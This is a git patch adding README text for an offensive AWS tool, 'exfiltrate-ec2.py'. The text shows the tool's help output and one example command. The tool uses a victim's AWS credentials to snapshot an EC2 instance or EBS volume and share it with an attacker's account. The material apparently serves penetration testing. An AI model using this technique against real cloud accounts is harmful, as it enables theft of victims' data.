From 54da016b7093696a033aac5c828c5f7d372cbd55 Mon Sep 17 00:00:00 2001 From: mgeeky Date: Wed, 4 Dec 2019 17:58:39 +0100 Subject: [PATCH] Readme updated --- clouds/aws/README.md | 55 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) diff --git a/clouds/aws/README.md b/clouds/aws/README.md index 7573005..9379aea 100644 --- a/clouds/aws/README.md +++ b/clouds/aws/README.md @@ -103,6 +103,61 @@ IAM Permissions abused: - `ec2:CreateImage` ``` +attacker $ python3 ./exfiltrate-ec2.py --help + + :: exfiltrate-ec2 + Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume + Mariusz B. / mgeeky '19, + +usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE] + [--access-key ACCESS_KEY] [--secret-key SECRET_KEY] + [--token TOKEN] [--victim-profile VICTIM_PROFILE] + [--victim-access-key VICTIM_ACCESS_KEY] + [--victim-secret-key VICTIM_SECRET_KEY] + [--victim-token VICTIM_TOKEN] [-v] + {createimage,createsnapshot} ... + +positional arguments: + {createimage,createsnapshot} + Available methods + createimage Creates a snapshot of a running or stopped EC2 + instance in an AMI image form. This AMI image will + then be shared with another AWS account, constituing + exfiltration opportunity. + createsnapshot Creates a snapshot of an EBS volume used by an EC2 + instance. This snapshot will then be shared with + another AWS account, constituing exfiltration + opportunity. + +required arguments: + --region REGION AWS Region to use. + +optional arguments: + -v, --verbose Display verbose output. + +Attacker's AWS credentials - where to instantiate exfiltrated EC2: + --profile PROFILE Attacker's AWS Profile name to use if --access-key was + not specified + --access-key ACCESS_KEY + Attacker's AWS Access Key ID to use if --profile was + not specified + --secret-key SECRET_KEY + Attacker's AWS Secret Key ID + --token TOKEN (Optional) Attacker's AWS temporary session token + +Victim AWS credentials - where to find EC2 to exfiltrate: + --victim-profile VICTIM_PROFILE + Victim's AWS Profile name to use if --access-key was + not specified + --victim-access-key VICTIM_ACCESS_KEY + Victim's AWS Access Key ID to use if --profile was not + specified + --victim-secret-key VICTIM_SECRET_KEY + Victim's AWS Secret Key ID + --victim-token VICTIM_TOKEN + (Optional) Victim's AWS temporary session token + + attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default --victim-profile victim-profile createsnapshot --volume-id vol-0f340890acfXXXXX --attach-instance-id i-0b359b0fcbcYYYYY :: exfiltrate-ec2